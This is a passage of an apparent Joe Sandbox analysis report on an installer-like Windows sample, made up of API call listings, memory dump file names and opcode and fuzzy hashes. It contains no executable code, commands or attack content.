                                                                                                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$CallMessageProcSendTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 601730667-0
                                                                                                            • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                                            • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                                                            • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                                            • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                                                            APIs
                                                                                                            • WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                                                            • CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 4071923889-0
                                                                                                            • Opcode ID: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                                                            • Instruction ID: 9fcdfe959295c415b2919edefc4bc283a9fb09ec36d5bd5c2e1fe4b9dd3ee853
                                                                                                            • Opcode Fuzzy Hash: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                                                            • Instruction Fuzzy Hash: D601B9706406087EEB2097A58C06F6B7BACDB85778F510567FA04DB2C2D9B89D408668
                                                                                                            APIs
                                                                                                            • 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                                            • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                                            • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                                            • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: A24620A480A570EnumFonts
                                                                                                            • String ID:
                                                                                                            • API String ID: 2630238358-0
                                                                                                            • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                                            • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                                                            • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                                            • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                                                            APIs
                                                                                                              • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                                            • FlushFileBuffers.KERNEL32(?), ref: 0045BBB9
                                                                                                            Strings
                                                                                                            • EndOffset range exceeded, xrefs: 0045BAED
                                                                                                            • NumRecs range exceeded, xrefs: 0045BAB6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$BuffersFlush
                                                                                                            • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                            • API String ID: 3593489403-659731555
                                                                                                            • Opcode ID: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                                                            • Instruction ID: f2711acf26be03df24c87a4523f52de689b41dfdc4f1b15506e6aedc90e5aeb3
                                                                                                            • Opcode Fuzzy Hash: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                                                            • Instruction Fuzzy Hash: 4761B734A002588BDB25DF15C881ADAB3B5EF49305F0084EAED899B352D7B4AEC8CF54
                                                                                                            APIs
                                                                                                              • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
                                                                                                              • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356
                                                                                                              • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                                              • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                                                              • Part of subcall function 00409B88: 6F551CD0.COMCTL32(0049708E), ref: 00409B88
                                                                                                              • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                                                              • Part of subcall function 00419050: GetVersion.KERNEL32(004970A2), ref: 00419050
                                                                                                              • Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                                                              • Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                                              • Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004970BB), ref: 0044F44F
                                                                                                              • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                                                              • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                                                              • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                                                              • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                                                              • Part of subcall function 004562AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                                                              • Part of subcall function 00463D1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                                                              • Part of subcall function 00463D1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                                                              • Part of subcall function 0046BE24: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                                                              • Part of subcall function 004776C8: GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                                                              • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                                                              • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                                                              • Part of subcall function 00494014: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049402D
                                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,0049712B), ref: 004970FD
                                                                                                              • Part of subcall function 00496E2C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                                                              • Part of subcall function 00496E2C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                                                              • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                            • ShowWindow.USER32(?,00000005,00000000,0049712B), ref: 0049715E
                                                                                                              • Part of subcall function 00480B7C: SetActiveWindow.USER32(?), ref: 00480C2A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                            • String ID: Setup
                                                                                                            • API String ID: 3870281231-3839654196
                                                                                                            • Opcode ID: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                                                            • Instruction ID: ebb0a401c3e664f155299204c0f5f4603c455a0fe39dfd081332d01f58350741
                                                                                                            • Opcode Fuzzy Hash: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                                                            • Instruction Fuzzy Hash: CE31B4312186409FDA11BBB7ED1391D3BA4EB8971C7A2447FF90482663DE3D58508A6E
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                            • 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: A25940CurrentThread
                                                                                                            • String ID: RzE
                                                                                                            • API String ID: 2655091166-1126107055
                                                                                                            • Opcode ID: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                                            • Instruction ID: ec4a18813bd70517abb30b2059a031d9bbc12b7253ca3772a6f1eb51880190fd
                                                                                                            • Opcode Fuzzy Hash: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                                            • Instruction Fuzzy Hash: 42015B75A04708BFD705CF6ADC1195ABBE9E78A720B22C87BEC04D36A0EB345814DE18
                                                                                                            APIs
                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B346,00000000,0047B35C,?,?,?,?,00000000), ref: 0047B122
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close
                                                                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                            • API String ID: 3535843008-1113070880
                                                                                                            • Opcode ID: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                                                            • Instruction ID: c0e5db093c22981a2c4b78a2736f8ddfc80e316131ebabe5fbae1d79ea558dad
                                                                                                            • Opcode Fuzzy Hash: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                                                            • Instruction Fuzzy Hash: F1F0BB70708284ABEB00D675FD92BDB3359D742344F50807BA5149B391D7B99E01D79C
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 004741F1
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 00474208
                                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                                            • String ID: CreateFile
                                                                                                            • API String ID: 2528220319-823142352
                                                                                                            • Opcode ID: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                                                            • Instruction ID: 58c46c97337ee3450255063b4db4f116026cd25e8145783c5652bdd163bde5c5
                                                                                                            • Opcode Fuzzy Hash: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                                                            • Instruction Fuzzy Hash: 78E06D342803447FEA10F769DCC6F5A7788AB04768F108152FA58AF3E3C6B9EC408618
                                                                                                            APIs
                                                                                                              • Part of subcall function 0045623C: CoInitialize.OLE32(00000000), ref: 00456242
                                                                                                              • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                                              • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                                            • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                            • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                            • API String ID: 2906209438-2320870614
                                                                                                            • Opcode ID: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                                                            • Instruction ID: 517aaa95fd919f42fec07b3e20ba2fe3b86c01757d5d2d7eeafb2f6c84d6a724
                                                                                                            • Opcode Fuzzy Hash: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                                                            • Instruction Fuzzy Hash: 4CC040D074455095CA0077FB540374F14149750717F5180BFB848675C7DF3D440D566E
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                                              • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                                            • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorLibraryLoadModeProc
                                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                            • API String ID: 2492108670-2683653824
                                                                                                            • Opcode ID: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                                                            • Instruction ID: f15142af1028fbda52646c9d138091dcd6bfc2c127db856ea005f68399f83491
                                                                                                            • Opcode Fuzzy Hash: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                                                            • Instruction Fuzzy Hash: 76B092A0B00780C6CE00BBB3A8127871528D740704B10C07F7240EA696FF7E8C458FEE
                                                                                                            APIs
                                                                                                            • GetSystemMenu.USER32(00000000,00000000,00000000,00480368), ref: 00480300
                                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00480311
                                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00480329
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Append$System
                                                                                                            • String ID:
                                                                                                            • API String ID: 1489644407-0
                                                                                                            • Opcode ID: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                                                            • Instruction ID: 04a05a6f5988e1ad1c69e12ed442e821a58669dfeb252773ef60a283987a992a
                                                                                                            • Opcode Fuzzy Hash: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                                                            • Instruction Fuzzy Hash: 3431B0707043441BD721FB769C8AB9E3A949B1531CF5408BBF800AA3D3CABC9C09879D
                                                                                                            APIs
                                                                                                            • 73A1A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044AC55
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0044AC78
                                                                                                            • 73A1A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044ACAB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: A480A570ObjectSelect
                                                                                                            • String ID:
                                                                                                            • API String ID: 1230475511-0
                                                                                                            • Opcode ID: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                                                            • Instruction ID: 3b5f26ead791ea6387a249f2cdaddc54e41ca9264cf2fbaff888b01415335cc3
                                                                                                            • Opcode Fuzzy Hash: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                                                            • Instruction Fuzzy Hash: CA21B670E44248AFEB01DFA5C885B9F7BB9EB48304F41807AF500E7281D77C9950CB6A
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,00480B97,?,?), ref: 0044A972
                                                                                                            • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
                                                                                                            • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DrawText$ByteCharMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 65125430-0
                                                                                                            • Opcode ID: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                                                            • Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
                                                                                                            • Opcode Fuzzy Hash: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                                                            • Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669
                                                                                                            APIs
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                                                            • TranslateMessage.USER32(?), ref: 0042449F
                                                                                                            • DispatchMessageA.USER32(?), ref: 004244A9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
